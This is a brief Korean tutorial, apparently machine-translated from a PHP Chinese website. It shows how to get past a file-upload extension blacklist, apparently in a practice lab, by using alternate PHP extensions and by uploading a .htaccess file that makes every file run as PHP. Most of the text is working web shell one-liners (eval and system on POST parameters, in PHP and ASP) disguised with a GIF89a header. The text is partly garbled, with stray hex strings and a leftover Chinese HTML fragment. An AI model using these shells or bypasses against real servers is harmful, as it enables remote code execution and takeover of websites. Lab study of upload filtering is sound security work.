이 글에서는 주로 파일 업로드를 통해 블랙리스트를 우회하는 방법을 소개합니다. 이제 특정 참조 가치가 있어 공유합니다. 도움이 필요한 친구들이 참고할 수 있습니다.
이 레벨은 주로 업로드 접미사를 설정하고, asp, php, jsp 등의 접미사는 업로드할 수 없습니다.
위치 1: 이 우회 방법은 접미사를 .php3, php5 등으로 수정하는 것입니다. 여기에 블랙리스트 확인('.asp', '.aspx', '.php', '.jsp')이 있습니다. php3, php5... 및 서버에서 구문 분석할 수 있는 기타 접미사 이름을 업로드하세요
위치 2: 우회하도록 파일 구문 분석 규칙을 다시 작성
1. 먼저 다음 내용을 포함하는 .htaccess
이라는 파일을 업로드하세요. :
7dbec1342203bda950e5c4d4c26c928b
SetHandler application/x-httpd-php
d4f50085796fcbc8b99545763f01d848
2. 스크립트
내용:
GIF89a <?php eval($_POST['joker']);?> <%eval request("joker")%> <?php system($_POST['cmd']);?>
<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下:<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>
이상이 이 글의 전체 내용입니다. 더 많은 관련 내용을 보시려면 PHP 중국어 웹사이트를 주목해주세요!
관련 권장 사항:
PHP는 Azure Storage Blob을 사용하여 파일을 업로드합니다
위 내용은 파일 업로드 시 블랙리스트를 우회하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!